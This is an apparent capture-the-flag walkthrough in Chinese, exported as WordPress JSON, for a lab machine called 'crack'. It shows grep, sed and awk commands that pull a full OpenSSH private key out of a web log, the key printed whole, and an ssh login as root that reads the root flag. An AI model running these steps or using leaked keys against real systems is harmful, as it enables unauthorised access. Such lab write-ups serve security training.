\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat log |grep -P '(?<= \/)[^ ]{20,}' -o\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\nb0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\nxNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\ntDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\nyp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\nKn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\nEAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\nNy5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\nwtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\narrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\nj8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\nb2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\nAfv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\nQ8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\nm6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\na4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\npeiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\nTB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\nTwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\nUnj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\nwQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\nWchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\nDbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\nTg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\noxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\ns8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat log |grep -P '(?<= \/)[^ ]+' -o|sed '1,2d'\n-----BEGIN\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\nb0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\nxNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\ntDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\nyp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\nKn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\nEAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\nNy5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\nwtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\narrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\nj8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\nb2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\nAfv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\nQ8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\nm6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\na4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\npeiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\nTB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\nTwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\nUnj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\nwQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\nWchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\nDbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\nTg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\noxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\ns8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n-----END<\/code><\/pre>\n\u8865\u5168\u4ee5\u540e\u5982\u4e0b\uff1a<\/p>\n
-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\nb0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\nxNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\ntDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\nyp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\nKn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\nEAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\nNy5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\nwtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\narrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\nj8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\nb2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\nAfv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\nQ8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\nm6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\na4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\npeiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\nTB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\nTwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\nUnj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\nwQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\nWchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\nDbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\nTg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\noxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\ns8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n\u7136\u540e\u4e00\u4e3e\u62ff\u4e0broot\uff01<\/p>\n
(remote) cris@crack:\/home\/cris$ vi id_rsa\n(remote) cris@crack:\/home\/cris$ chmod 600 id_rsa\n(remote) cris@crack:\/home\/cris$ ssh root@127.0.0.1 -p 22 -i id_rsa\nThe authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.\nECDSA key fingerprint is SHA256:7z5F9pr6GN7gcEMbKUwipxWswKEpR9bMKOVzGc0V7\/s.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.\nLinux crack 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Wed Jun 7 22:11:49 2023\nroot@crack:~# cd \/root\nroot@crack:~# ls -la\ntotal 32\ndrwx------ 5 root root 4096 abr 22 14:32 .\ndrwxr-xr-x 18 root root 4096 jun 7 2023 ..\nlrwxrwxrwx 1 root root 9 jun 7 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 571 abr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 abr 22 14:32 .cache\ndrwxr-xr-x 3 root root 4096 jun 7 2023 .local\n-rw-r--r-- 1 root root 161 jul 9 2019 .profile\n-rw------- 1 root root 19 jun 7 2023 root_fl4g.txt\ndrwx------ 2 root root 4096 jun 7 2023 .ssh\nroot@crack:~# cat root_fl4g.txt \nwRt2xlFjcYqXXo4HMV<\/code><\/pre>\n\u989d\u5916\u6536\u83b7<\/h2>\nawk\u63d0\u53d6\u6570\u636e<\/h3>\n
\u6ca1\u8fc7\u51e0\u5206\u949f\u5e08\u5085\u53d1\u7684\u597d\u7406\u89e3\u7684\u7248\u672c\uff1a<\/p>\n
<\/div><\/p>\ncat log|awk '\/GET\/{print $7}'|sed 's\/^.\/\/g'<\/code><\/pre>\n\u4ecelog<\/code>\u6587\u4ef6\u4e2d\uff0c\u5bfb\u627e\u5e26\u6709GET<\/code>\u7684\u884c\uff0c\u6253\u5370\u7a7a\u767d\u5206\u5272\u7684\u7b2c\u4e03\u4e2a\u5b57\u6bb5\uff0c\u5339\u914d\u6bcf\u4e00\u884c\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26\u5e76\u5220\u9664\u3002<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack]\n\u2514\u2500$ cat log|awk '\/GET\/{print $7}'\n\/randomfile1\n\/frand2\n\/-----BEGIN\n\/b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\n\/NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn\n\/b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt\n\/xNQ8NxRO4\/bC1v90lUrhyLi\/ML5B4nak+5vLFJi8NlwXMQJ\/xCWZg5+WOLduFp4VvHlwAf\n\/tDh2C+tJp2hqusW1jZRqSXspCfKLPt\/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k\n\/\/+FwJbMna8iPwmvK6n\/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu\n\/yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl\n\/Kn2aZN\/8xWAB+\/t96TcXogtSbQw\/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3\/Cb34a\/6v8c\n\/9rMjGl9HMZFDwswzAGrvPOeroVB\/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2\n\/EAAAGBAMQb0XtxB+u8vYyLdq8Gu\/bbzw8Jm9lpmL\/HMz5+G4EgqRZoQ8h8J29CFMssN4j0\n\/Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2\n\/wtb\/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado\n\/arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP\/hcCWzJ2vI\n\/j8Jryup\/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn\n\/b2FK7qDomlEWLqc7scNuUWqNEm\/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf\/MVg\n\/Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN\/wm9+Gv+r\/HPazIxpfRzGR\n\/Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg\n\/3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh\/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2\n\/m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa\/\n\/a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR\/3uSMN\n\/peiKDzLI\/Y+QcQku\/7GmUIV4ugP0fjMnz\/XcXqe6GVNX\/gvNeT6WfKPCzcaXiF4I2i228u\n\/TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG\n\/TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf\/yUyK04a6mhFg3kJzsxE+iDOVH28D\n\/Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA\n\/wQDlr9NWE6q1BovNNobebvw44NdBRQE\/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo\n\/0MoSXZXiC\/0\/CSfe6Je7unnIzhiA85jSe\/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO\n\/1ROwaN5uL26gIgtf\/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP\n\/WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo\n\/0sTQ3d\/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr\n\/DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1\n\/Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl\n\/\/RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh\n\/oxY6YRERurpcyYuSa\/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq\n\/2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf\n\/6xpD9lHWyp+ocD\/meYC7V8aio\/W9VxL25NlYwdFyCgecd\/rIJQ+tGPXoqXIKrf5lVrVtFC\n\/s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s=\n\/-----END<\/code><\/pre>\ngrep -P<\/h3>\ncat log |grep -P '(?<= \/)[^ ]{20,}' -o<\/code><\/pre>\n\n(?<= \/)<\/code>\u8868\u793a\u5339\u914d\u524d\u9762\u5e26\u6709\/<\/code>\u7684<\/li>\n[^ ]{20,}<\/code>\u5339\u914d\u4efb\u4f55\u975e\u7a7a\u683c\u5b57\u7b26\u81f3\u5c1120\u6b21<\/li>\n<\/ul>\ngrep+sed<\/h3>\ncat log |grep -P '(?<= \/)[^ ]+' -o|sed '1,2d'<\/code><\/pre>\n\n(?<= \/)<\/code>\u8868\u793a\u5339\u914d\u524d\u9762\u5e26\u6709\/<\/code>\u7684<\/li>\n[^ ]+<\/code>\u5339\u914d\u4e00\u4e2a\u6216\u591a\u4e2a\u975e\u7a7a\u683c\u5b57\u7b26<\/li>\n1,2d<\/code>\u5220\u9664\u8f93\u5165\u7684\u524d\u4e24\u884c<\/li>\n<\/ul>\n\u4f18\u96c5\uff0c\u592a\u4f18\u96c5\u4e86\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
crack \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/crack] \u2514\u2500$ rusts […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-606","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/606","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=606"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/606\/revisions"}],"predecessor-version":[{"id":607,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/606\/revisions\/607"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=606"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=606"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=606"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240422202441365\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059141.png\")
<\/div><\/p>\n![\"image-20240422202801105\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059142.png\")
<\/div><\/p>\n![\"image-20240422202908596\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059143.png\")
<\/div><\/p>\n![\"VeryCapture_20240422204609\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059144.jpg\")
<\/div><\/p>\n![\"image-20240422205211098\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404222059145.png\")
<\/div><\/p>\n